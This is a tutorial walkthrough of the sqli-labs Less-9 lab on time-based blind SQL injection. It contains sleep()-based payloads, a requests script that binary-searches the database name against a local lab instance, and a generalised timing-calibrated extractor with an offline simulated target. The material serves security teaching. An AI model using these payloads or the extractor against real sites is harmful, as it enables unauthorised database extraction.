In Less-9 of sqli-labs, we can neither see the query's result on the page nor extract it through boolean-based blind injection. What is left is to infer information from how long the page takes to respond: time-based blind injection.
Looking at the Less-9 code, the page returns "You are in" regardless of whether the injected condition is true or false, so the response body carries no information at all; only the response time does.
可以在网页中输入以下代码:
id=1' and if(ascii(substr(database(),1,1))>115, sleep(3), 0) --+
If the first character of the database name has an ASCII code greater than 115 (the letter "s"), the server executes sleep(3) and the page takes about three seconds longer to come back; otherwise it returns immediately. The response time therefore tells us whether the condition is true.
Querying one comparison at a time by hand is still tedious, so we use a script that does the binary search over the ASCII range for us. One practical caveat when automating this with requests: the "--+" comment from the URL bar relies on the browser sending "+" literally so that PHP decodes it as a space, but requests percent-encodes "+" in query parameters as %2B, which the server decodes back to a literal "+" and MySQL then does not treat "--+" as a comment. Sending "-- " (dash, dash, space) instead avoids the problem.
import requests
import time

def inject_database(url):
    """Recover database() one character at a time by binary search on its ASCII value.
    A response that takes at least one second means the sleep(2) branch ran, i.e. the
    character is greater than mid."""
    name = ''
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # '-- ' (with a trailing space) rather than '--+': requests encodes '+' as %2B,
            # so '--+' would reach MySQL as a literal plus sign and not as a comment.
            payload = "1' and if(ascii(substr(database(),%d,1)) > %d, sleep(2), 0) -- " % (i, mid)
            params = {"id": payload}
            start_time = time.time()
            res = requests.get(url, params=params)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1      # the server slept: the character is greater than mid
            else:
                high = mid
            mid = (high + low) // 2
        # ascii('') is 0 in MySQL, so past the end of the name the search bottoms out at 32
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)
    return name

url = 'http://127.0.0.1/sqli-labs/less-9/'
db_name = inject_database(url)
print("DATABASE is:", db_name)
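The script above only works against a running sqli-labs instance and takes a couple of seconds per comparison. The following is an added, self-contained example (not code from the original post or from sqli-labs) that runs offline: a constructed stand-in for the Less-9 backend that sleeps when the injected condition is true, plus a generalised extractor that calibrates the timing threshold against the baseline response time before starting and can pull any expression (database(), user(), ...) rather than only database(). The database name "security" and the user "root@localhost" are assumptions matching the sqli-labs defaults; the regular expression in fake_target is only there to emulate MySQL evaluating the injected if(...) and is not something the real target does.

```python
import re
import time
from typing import Callable

# Constructed stand-in for the sqli-labs Less-9 backend (assumption: the
# database is "security", the default in sqli-labs). Instead of running MySQL
# it pattern-matches the injected condition and sleeps when the condition is
# true, which is exactly what sleep() inside if() does on the real target.
SECRET = {"database()": "security", "user()": "root@localhost"}
_COND = re.compile(
    r"ascii\(substr\((.+?),(\d+),1\)\)\s*>\s*(\d+)\s*,\s*sleep\((\d+(?:\.\d+)?)\)"
)


def fake_target(payload: str) -> str:
    """Emulates the Less-9 page: always answers 'You are in', delays only when the condition holds."""
    m = _COND.search(payload)
    if m is None:
        return "You are in"  # nothing injected (or a payload MySQL could not parse): no delay
    expr, pos, threshold, delay = m.group(1), int(m.group(2)), int(m.group(3)), float(m.group(4))
    ch = SECRET.get(expr, "")[pos - 1:pos]
    if (ord(ch) if ch else 0) > threshold:  # MySQL returns 0 for ascii('')
        time.sleep(delay)
    return "You are in"


def timed(send: Callable[[str], str], payload: str) -> float:
    """Response time of one request, in seconds."""
    start = time.perf_counter()
    send(payload)
    return time.perf_counter() - start


def calibrate(send: Callable[[str], str], delay: float, samples: int = 5) -> float:
    """Decision threshold: the slowest normal response seen plus half the sleep.
    Measuring the baseline first avoids mistaking network jitter for sleep()."""
    baseline = max(timed(send, "1' and 0 -- ") for _ in range(samples))
    return baseline + delay / 2


def extract(send: Callable[[str], str], expr: str, delay: float = 0.05, max_len: int = 32) -> str:
    """Time-based blind extraction of `expr`, one character at a time, by binary
    search on its ASCII value. `delay` is the sleep() argument sent to the server."""
    threshold = calibrate(send, delay)
    out = ""
    for pos in range(1, max_len + 1):
        low, high = 0, 127  # start at 0 so that ascii('') == 0 marks the end of the string
        while low < high:
            mid = (low + high) // 2
            # '-- ' (trailing space) instead of '--+': requests encodes '+' as %2B
            payload = "1' and if(ascii(substr(%s,%d,1)) > %d, sleep(%s), 0) -- " % (expr, pos, mid, delay)
            if timed(send, payload) >= threshold:
                low = mid + 1  # the true branch slept: the character is greater than mid
            else:
                high = mid
        if low == 0:
            break  # past the end of the value
        out += chr(low)
    return out


if __name__ == "__main__":
    print("DATABASE is:", extract(fake_target, "database()"))
```

Against a real Less-9 instance, replace fake_target with a sender such as `lambda p: requests.get(url, params={"id": p}).text` and raise `delay` to two or three seconds so that the sleep stands out from normal network latency; the calibration step then also absorbs the real baseline round-trip time. Each character costs seven requests (a 128-value range halved each time), so a short sleep that is still clearly above the measured baseline keeps the total run time manageable.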